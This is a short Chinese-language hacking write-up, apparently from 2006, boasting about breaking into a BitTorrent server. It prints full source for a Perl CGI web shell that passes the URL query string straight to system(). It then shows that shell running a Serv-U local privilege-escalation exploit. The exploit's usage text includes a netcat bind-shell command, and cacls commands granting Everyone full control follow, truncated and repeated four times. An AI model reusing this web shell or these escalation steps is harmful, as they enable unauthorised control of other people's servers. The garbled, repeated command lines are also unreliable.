你BT我更BT!记一次入侵BT服务器
2006-07-04 20:33:05 来源:WEB开发网binmode(STDOUT);
syswrite(STDOUT,"Content-type:text/html\r\n\r\n",27);
$_=$ENV{QUERY_STRING};
s/%20//ig;
s/%2f/\//ig;
$execthis=$_;
syswrite(STDOUT,"
\r\n",13);
open(STDERR,">&STDOUT")||die"Can’tredirectSTDERR";
system($execthis);
syswrite(STDOUT,"\r\n
\r\n",17);
close(STDERR);
close(STDOUT);
exit;
我用过最好的cgishell,保存为一个cgi文件执行,晕……居然不支持!一阵阵郁闷袭来,2秒钟的郁闷后,想到还有一线希望,那就是pl,我们还没有试试pl扩展呢,把刚才的cgi文件改为pl文件,提交 http://anyhost//cmd.pl?dir ,我的天啊!!
显示“拒绝访问”,终于可以执行了!太兴奋了,马上提交:
http://anyhost//cmd.pl?d:\user\bin\su.exe
返回:
Serv-u>3.xLocalExploitbyxiaolu
USAGE:serv-u.exe"command"
Example:serv-u.exe"nc.exe-l-p99-ecmd.exe"
嘻嘻~~现在是IUSR权限,那又怎么样?看你这次还不死?提交: http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"
http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"
http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"
http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"
更多精彩
赞助商链接